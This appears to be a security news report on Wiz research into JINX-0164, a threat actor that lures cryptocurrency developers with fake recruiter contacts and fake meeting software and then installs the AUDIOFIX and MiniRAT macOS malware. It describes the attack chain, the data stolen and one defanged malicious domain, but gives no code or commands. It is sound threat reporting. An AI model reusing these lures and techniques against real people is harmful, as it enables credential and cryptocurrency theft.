A new campaign orchestrated by a previously undocumented threat actor has targeted cryptocurrency organizations with an aim to facilitate digital asset theft using recruitment-themed social engineering and bespoke macOS malware.
“These campaigns leveraged sophisticated social engineering techniques, custom macOS malware, and deep targeting of CI/CD infrastructure,” Wiz researchers Shira Ayal, Eden Abergil, Andre Maccarone, Yuval Dan, and Benjamin Read said. “The used methods enabled the threat actor to move laterally from compromised employee laptops to code distribution systems and development infrastructure.”
The Google-owned cloud security company is tracking the activity under the moniker JINX-0164. The threat actor is assessed to be active since at least mid-2025 and motivated by financial gain, targeting developers through recruitment-themed and other social engineering techniques to siphon cryptocurrencies. In at least one case, the adversary is said to have carried out a supply chain attack.
In the attack chain documented by Wiz, JINX-0164 has been found to leverage credible LinkedIn profiles to approach victims and offer a virtual meeting. The meeting invite is designed to steer the target to a rogue domain that masquerades as a teleconference provider.
From there, victims are tricked into downloading and installing the program. This, in turn, triggers the retrieval of a Python-based macOS infostealer and remote access trojan codenamed AUDIOFIX using a bash script hosted on a fake driver store domain (“apple.driver-store[.]com”).
“The [bash] script downloaded an architecture-aware payload from the same domain, compatible with both Intel and Apple Silicon systems. The payload masquerades as a system audio driver named coreaudiod, was saved as ChromeUpdater, and was executed via launchctl,” Wiz said.
The Python malware is then leveraged to steal sensitive data from the compromised endpoint, laterally move to internal code distribution systems and development infrastructure by injecting the AUDIOFIX payload, and modify source code in an attempt to compromise other endpoints and steal cryptocurrency wallet credentials.
The captured data includes credentials from password managers, web browsers, and iCloud Keychain files; local admin credentials; SSH keys; configuration files; console history files; cryptocurrency browser extensions information; cryptocurrency wallet addresses; and active Discord, Slack, and Telegram sessions.
Besides information theft, AUDIOFIX supports several commands that allow manual reconnaissance, exfiltration, arbitrary shell command execution, file deletion, and payload retrieval from an external server.
JINX-0164 has also been observed targeting software developers by impersonating recruiters, while employing the same social engineering technique: using the job opportunity to set up a meeting that displays a fake technical error and instructs the victim to download a “fix” that leads to malware installation.
Another key component of the threat actor’s arsenal is MiniRAT, a Go-based backdoor that was previously distributed via a compromised version of an npm package named @velora-dex/sdk, a legitimate DeFi toolkit used for token swaps, limit orders, and delta trading on the VeloraDEX decentralized exchange platform.
Per details shared by SafeDep and StepSecurity last month, the poisoned version downloaded a shell script from a remote server, which then delivered an macOS-specific binary called MiniRAT. The malware is equipped to upload files, run arbitrary shell commands, and fetch additional payloads or tools from attacker-controlled domains.
It’s worth noting that some aspects of the campaign, coupled with the use of VPN services like Astrill VPN and the focus on cryptocurrency and developers, are reminiscent of those used by multiple North Korean threat clusters such as BlueNoroff, Contagious Interview, and UNC1069. However, Wiz said there are no infrastructure overlaps connecting JINX-0164 to Pyongyang at this stage.
“Similarly, the types of spoofing domains are similar to those used by other North Korean actors; however, JINX-0164 infrastructure does not have any overlaps with other publicly tracked North Korean groups,” Wiz said.
